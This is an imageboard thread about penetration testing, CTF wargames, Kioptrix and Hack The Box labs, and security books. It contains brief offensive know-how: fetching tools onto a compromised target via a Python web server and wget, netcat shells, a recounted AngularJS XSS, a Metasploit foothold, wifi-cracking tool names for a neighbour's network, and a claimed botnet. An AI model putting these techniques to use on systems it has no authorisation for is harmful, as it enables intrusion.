/hmg/ Hackerman General

If you think this topic belongs in cyb, you dont belong in this topic.

In /hmg/ we discuss pentesting, ctfs, exploits, and general being a hackerman.

Resources:

VM/CTFs:
overthewire.org/wargames/bandit/
>easy beginner bullshit

vulnhub.com/
>prebroken images to work on.

hackthebox.eu/
>super secret club

Tools:
kali.org/
>meme dragon distro but it just werks

metasploit.com/
>scriptkiddie starting point and swiss army knife

Tutorials/Guides:
abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob
>From zero to OSCP-hero rough outline

youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
>IppSec, video guides for retired HTB VMs.

Certs:
eccouncil.org/programs/certified-ethical-hacker-ceh/
>CEH, only looks good a resume to non-technical in HR

offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/
>OSCP, the big dick swinging exam, 24 hours to own 5 machines and a further 24 hours to write up a report detailing your methods.

Other urls found in this thread:

archive.org/details/TheHackerPlaybook2_uploaded_by_megahackz.tk
doc.lagout.org/security/The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
youtube.com/watch?v=0HXsb8xLF8w
nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
255.255.255.255:8080/foo.bar
twitter.com/SFWRedditGifs

It's a nice day today. My ticket queue is basically empty (I do general IT), it's raining heavy as hell outside so it's a wee bit chilly but the floor has heating on so it's toasty af, and my favourite general has come back.

Im going to spend the rest of today working through kioptrix level 3. I learnt a metric fuckload going through 1 and 2 last week, particularly about bash reverse shells.

Also if anyone has a direct PDF link to hackers playbook I'd appreciate it.

Did uhh

Did you look at all for it?

It's literally the third fucking result when searching hackers playbook PDF..

happy hacking my friend

archive.org/details/TheHackerPlaybook2_uploaded_by_megahackz.tk

doc.lagout.org/security/The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf

yw bb

Also, that doc.lagout.org site has quite a few handy pdfs, you should check it out.

Oh dang thanks man/woman, you the real MVP

It's too warm to bust out my fingerless gloves but I would if I could

how 2 bcome a kraker g0d???

One of the games I'm playing is giving me the fucking shits, and I'd love to be able to just drop a money cheat in to help me win.

Sadly the game has no fucking cheats.

What sort of tools am I looking at to poke around in the memory to work out what I'm looking for and to make a cheat?

also if you guys are on htb and want a team drop your name and I'll invite.

if you don't know calculus and linear algebra, you're not a hacker

Ok anonymous dude on the internet who has no credentials to back up his statement

how are you going to understand ML if you don't know the math? you DO use ML in your hacking right? pls don't tell me you use deterministic fuzzers

tips for getting a job in netsec after school? cs junior here

Post your
>age
>location
>size of botnet

You can stop at any time, mr buzzword

Ask the sec thread. This is an extremely specific thread for a very specific purpose. This isn't a netsec general, and it won't ever be.

>18
>canaderp
>zero bots

it's a bad feel senpai

>not realising this is a variant of asl from icq
Goddamn you are young

I know you fucking mong

Since when are you not allowed to reply to shitposts

when you post pham. if that word is in your vocab youre too young to be here.

Wow, I had no idea hiro put filters on tee bee aych and eff ay em

Or maybe that was part of the joke desu senpai

>Or maybe that was part of the joke desu senpai
>I was only pretending to be retarded!

thanks user. you are beautiful

>posting the word senpai is retarded
>on fucking Sup Forums

wew lad. at least I'm not assmad about random dudes on the internet being younger than me.

Right this is an interesting game so far; the sql cheat code does not work on the lotusCMS log in, but it does get me into the phpmyadmin site.

It gives me fuck all privlages though, as I can't make a new db, and can't execute any sql so I can't do some fuckery there

I am a hackerman, please don't arrest me.

which game?

OTW probs

Level three of kioptrix

The rabbit hole gets even deeper dude; running a Nikto scan reveals a gallarafic app, and hidden in the source code of the HTML is a commented out line for an admin page.

Of fucking course this one does not respond to the cheat code either.

well looks like i missed something really fucking obvious; metasploit has an exploit for lotuscms. i tried it when i first loaded up the game but it didnt take. tried it again and it worked, not sure whats different this time..

anyway at least i have a base on the system now, and its a meterpreter session so i can try escalate

As much as I personally hate it, my first move is to check metasploit. Sometimes it just werkz even if it feels skiddy.

>hackers playbook
Shit man I'm 1/4 in and so far I've learnt nothing new. Do I have the wrong idea about this book or something?

Reread it with a bit more focus. You've missed a lot if you think it's of no value

Cheat engine

How do I hack my neighbor wifi?

youtube.com/watch?v=0HXsb8xLF8w

What the fuck did you just feed me

Reaver and aircrack Ng

but why

ok metasplopit is giving me the fucking shits

theres so many linux commands i want to run the shell doesnt recognise. cant do uname, run scripts or binaries, fucks sake.

only a retard doesn't know Sup Forums has word replacements for banned words

when you see the two words used right next to each other, this is a sure sign they aren't actually posting these words like a god damn weeb

doooooooood

we need to organize a /sec/ vs /hmg/ ctf

As srs as those guys take themselves, they won't even get the invite code from HTB.

I've made this general 5 or 6 days in a row now (all except the original one were me) and I've seen so much more work and progress reports in the week it's existed than the last six months of cyb.

I tried my best to make that general a good place for this sort of shit. No one cared, because everyone was too busy posting sad aesthetic pictures and adding useless shit to a very ugly pasta.

For faggots who don't know where to start
>cybrary.it
go there and pick the pentesting course.

Going top to bottom on the resources of the OP is a better method, really

so what do you hack besides wifi passwords?

CTFs and boot2roots

The Gibson

Ya missed s m h my man

I'm stuck at level 5 in overthewire, every file is empty, what the fuck?

Never mind i'm so fucking retarded holy shit

WHY IS HE SO FUCKING UGLY!?

Top kek

We've all been there user

It's the bug eyes

He really does have the druggo look

depends on my mood but i've reverse engineered and developed exploits for some proprietary software in the part
but yeah general appsec stuff when i'm actually feeling like it usually

>left college in first year
>planning on going back (for a cybersecurity course) in September
>fascinated by hacking shit
Should I just ignore it so I can learn this stuff in college or should I keep learning on my own and then have to do things I already know when I'm in college?
>Just don't go to college bro
Can't, I don't want to miss out on the college experience

>College Experience.
Debt.
Venereal disease.
Low income side job.
Friends that can't wait for you to finish homework.
No life.

Damn lucky bro enjoy the experience.

>Debt.
I'm not a third-worlder, I can get grants from the government so the taxpayer can pay for my college. I'll do it for free.
>Venereal disease.
Condoms.
>Low income side job
No side job.
>Friends that can't wait for you to finish homework.
At least I'll have friends.
>No life.
I have no life now, there's no possible way I could have any less of a life when I go to college than I have now.

how 2 rop like a g0d?

>The password for the next level is stored in the file data.txt and is the only line of text that occurs only once
>and is the only line of text that occurs only once
Shit's getting intense over here
How the fuck am i supposed to do this

Look up sort and uniq

>uniq is intense

You poor child
Have fun with cron and nc

What is the name of this program? So I can simulate a bad connection.

f = open('data.txt')
dictionary = {}
for line in f.readlines():
if line in dictionary: dictionary[line] += 1
else: dictionary[line] = 1
for k, v in dictionary:
if v == 1: print(k)

should do the trick unless the lines are too long to be used as the hash in python

if you don't want to use a dict you can also sort them lexicographically and then iterate through

>scripts
Oh shit i totally forgot i can automatize my autism
better get on ruby

Can you guys teach me how to hack missiles so I can destroy hitlers cloaked marauder class attack ships?

If you're considering ignoring it as you say, you can't be that interested. This also isn't the thread for you.

ruby's dying because rails is dying. good language but i'd start with python if i were you

Got to successfully test out my first couple webapp exploits the other day when the potato Dev that our client provided to work with us decided to mix mvc routing with our angular frontend. Fucking idiot stuck the search parameters in the header on the page using a view bag so that it was rendered before angular, meaning I could write inline angular into the search bar and have it render on the page. Combine that with angularjs 1.5 exploits to escape the sandbox and I was able to write xss into the page, store it in a URL and send it.

His solution was client side regex. For fucks sake all he has to do is pass down the search parameters with the model and have angular render it but he's such a fucking idiot that he couldn't figure this out. So now you can't write the xss into the search bar, but you can still write it in the URL and send it to someone.

He also put in regex to stop people from sticking in image tags into items returned by the search results (he wanted to allow html for some bizarre fucking reason). He put this in because I added a shaking dog gif into the search just before he was going in to present his search to the CEO. I changed my html from

To And it showed up again while he was presenting it. Apparently they may be in talks to fire him now kek

>"18"
>VA
>smol, 1351 http GET bots. I don't use it much, but i maintain one for the rare occasion that i need it.

shut the fuck up, joey

web dev are scum

holy hell Disobey had a full panel about shitty developers, are they actually like this?
who hires them and based on what criteria???

I know both but I'm not a hacker :/

Bandit12 is such a bullshit, holy fuck.

I couldn’t get past 23. The script worked, but didn't have privileges to retrieve the pass. The cron job should have run it at an elevated privilege level, which should have allowed it to function, but it still didn’t work. I don't know why. I couldn't get it to output any debug information, either. It's like it got deleted without being run at all, which I understand to be impossible. Maybe I’ll give it another shot someday.

What was 23? The one who deletes the script on the folder?

You have to chmod 777 the script and the /tmp/ folder you want the password saved in. It also might take a few minutes for the cronjob to do it's magic.

12 is literally the hardest bandit level

I think I tried those, but it's been a while. I should check that out. Thanks, user.

Yeah.

Quick, what's the syntax for copying a file from an SSH'd machine to your machine?

scp [email protected]: sshkey.private /tmp
isn't working

use sftp
bandit was impossible for me but then i quit, read a book on unix and the art of exploitation, and came back to it and it was easy

only a jobless CS undergraduate faggot would think knowing calc and linear is impressive

probably an issue with the path user. try the full path after ":"

Mind sharing the name of that book, friendo ?

the unix programming environment and hacking the art of exploitation. and i forgot i also read assembly language step by step

all you need and 90% of you urchins don't know it

Anyone know a good C# decompiler on Linux?

Mono crashes on me and I'm getting tired of reading MSIL in IDA. Because of course hex-ray isn't going to lower itself to pleb-tier IL decompiling...

Copypaste the key, create the file on your machine and chmod 777 that bitch

illya!

Original OP Here, thanks for keeping it going.

And as usual if anyone wants on a team for htb post your htb username and I'll add.

i'd use netcat if it is small, you should learn you way around it since NC shells run on nearly everything and knowing how to deploy them is great.

nakkaya.com/2009/04/15/using-netcat-for-file-transfers/

Going the other way I usually do:

>python -m SimpleHTTPServer 8080
on my machine

>wget 255.255.255.255:8080/foo.bar
on the target

90% of the time this is how I shuffle linenum over.

>good C# decompiler on Linux
>IDA
you already mentioned it

It disassemble, but since when does it decompile shit?

when you compile the assembly :^)

anyone read Violent Python here? could be going to get a PhD at the same place he's getting his. except he has a million certs and was in the army for like a decade and i'm no one

maybe he'd become my senpai

Are you talking about the author or something? You changed track there very suddenly

yeah TJ O'Conner

also give me ideas for a phd project